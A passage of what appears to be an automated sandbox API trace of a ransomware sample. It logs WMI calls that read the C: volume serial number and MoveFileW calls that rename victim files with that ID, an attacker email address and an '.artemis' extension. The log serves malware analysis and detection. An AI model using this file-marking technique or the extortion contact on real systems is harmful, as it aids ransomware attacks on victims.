puResponse=0x6ceec44*=0xc19) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.443] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0192.443] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0192.443] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0192.444] IUnknown:Release (This=0x72015c) returned 0x1 [0192.444] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x6736df8) returned 0x0 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736df8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0192.445] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736df8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6738770) returned 0x0 [0192.445] WbemDefPath:IUnknown:Release (This=0x6736df8) returned 0x0 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6738770) returned 0x0 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0192.445] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x7ae4a0) returned 0x0 [0192.445] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae4a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.445] WbemDefPath:IUnknown:Release (This=0x7ae4a0) returned 0x3 [0192.445] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0192.445] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0192.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0192.445] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0192.445] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0192.446] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0192.446] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0192.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6738770) returned 0x0 [0192.446] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0192.446] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0192.446] WbemDefPath:IWbemPath:SetText (This=0x6738770, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0192.446] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0192.446] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0192.446] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.446] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0192.446] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0192.446] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0192.446] IUnknown:Release (This=0x72015c) returned 0x1 [0192.447] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x672f358) returned 0x0 [0192.447] WbemLocator:IUnknown:QueryInterface (in: This=0x672f358, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0192.447] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f358, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x6736ec8) returned 0x0 [0192.447] WbemLocator:IUnknown:Release (This=0x672f358) returned 0x0 [0192.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x6736ec8) returned 0x0 [0192.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0192.447] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0192.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0192.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0192.448] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0192.448] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0192.448] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0192.448] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0192.448] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0192.448] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0192.448] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0192.448] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0192.448] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x6736ec8) returned 0x0 [0192.448] WbemLocator:IUnknown:AddRef (This=0x6736ec8) returned 0x3 [0192.448] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x2 [0192.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0192.448] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0192.448] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.448] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6737058) returned 0x0 [0192.448] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737058, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x67482bc) returned 0x0 [0193.522] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x781ae4) returned 0x0 [0193.522] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ae4, pProxy=0x67482bc, pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0193.522] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x1 [0193.522] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x781b04) returned 0x0 [0193.522] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x781ae4) returned 0x0 [0193.522] WbemLocator:IClientSecurity:SetBlanket (This=0x781ae4, pProxy=0x67482bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0193.523] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x2 [0193.523] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0193.523] CoTaskMemFree (pv=0x77dde8) [0193.523] WbemLocator:IUnknown:Release (This=0x6737058) returned 0x0 [0193.523] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x781b04) returned 0x0 [0193.523] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0193.526] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0193.529] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0193.529] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0193.594] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0193.596] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x781a64) returned 0x0 [0193.596] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781a64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.596] WbemLocator:IUnknown:Release (This=0x781a64) returned 0x3 [0193.596] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0193.597] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0193.597] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x781aec) returned 0x0 [0193.597] WbemLocator:IRpcOptions:Query (in: This=0x781aec, pPrx=0x781b04, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0193.597] WbemLocator:IUnknown:Release (This=0x781aec) returned 0x3 [0193.597] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0193.597] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0193.597] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0193.597] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x67482bc) returned 0x0 [0193.597] WbemLocator:IUnknown:AddRef (This=0x67482bc) returned 0x4 [0193.597] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x3 [0193.597] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x2 [0193.597] SysStringLen (param_1=0x0) returned 0x0 [0193.597] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0193.597] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0193.597] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.597] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0193.597] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0193.597] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x781b04) returned 0x0 [0193.597] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x3 [0193.597] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0193.598] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0193.598] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.598] IWbemServices:GetObject (in: This=0x67482bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceebe4*=0x673c128, ppCallResult=0x0) returned 0x0 [0195.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6ceebe4 | out: puCount=0x6ceebe4*=0x2) returned 0x0 [0195.379] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceebe0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebe0*=0xf, pszText=0x0) returned 0x0 [0195.379] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceebe0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebe0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.403] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x349066c*=0, plFlavor=0x3490670*=0 | out: pVal=0x6ceebe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x349066c*=8, plFlavor=0x3490670*=0) returned 0x0 [0195.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.403] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x349066c*=8, plFlavor=0x3490670*=0 | out: pVal=0x6ceebe8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x349066c*=8, plFlavor=0x3490670*=0) returned 0x0 [0195.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.403] SysStringByteLen (bstr="9C354B42") returned 0x10 [0195.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0195.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5e [0195.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec48) returned 1 [0195.404] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), fInfoLevelId=0x0, lpFileInformation=0x6ceecc4 | out: lpFileInformation=0x6ceecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1a446c00, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x44d0)) returned 1 [0195.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec44) returned 1 [0195.404] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0195.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0195.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 